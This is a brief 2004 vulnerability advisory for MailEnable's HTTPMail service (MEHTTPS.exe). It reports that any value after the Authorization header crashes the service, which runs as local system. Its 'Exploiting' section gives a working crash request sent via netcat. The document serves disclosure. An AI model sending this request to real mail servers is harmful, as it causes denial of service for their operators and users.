MailEnable HTTPMail Remote Authorization Header Overflow
=========================================================

"MailEnable's Messaging Services Platform is a powerful and scalable hosted messaging platform for the Microsoft Windows platform. 
All the elements of a professional and high performance mail server have been integrated into MailEnable with all the difficult 
and tedious aspects sheltered as advanced configuration options."

Exploiting:
===========

Netcat localhost 8080
GET / HTTP/1.0
Authorization: X


Problem:
========

It seems, that every argument, following the Authorization header-field will crash the service (MEHTTPS.exe).
MEHTTPS.exe runs as a windows service with "local system" account privileges!

Version:
========

Mailweb Professional 1.18 with latest hotfix (http://mailenable.com/hotfix/MEHTTPS.zip)
Other versions may also be affected.

Vendor:
=======

http://www.mailenable.com/

Vendor-Status:
==============

Informed

Discovered:
===========

14.05.2004
www.oliverkarow.de
www.oliverkarow.de/research/MailWebHTTPAuthCrash.txt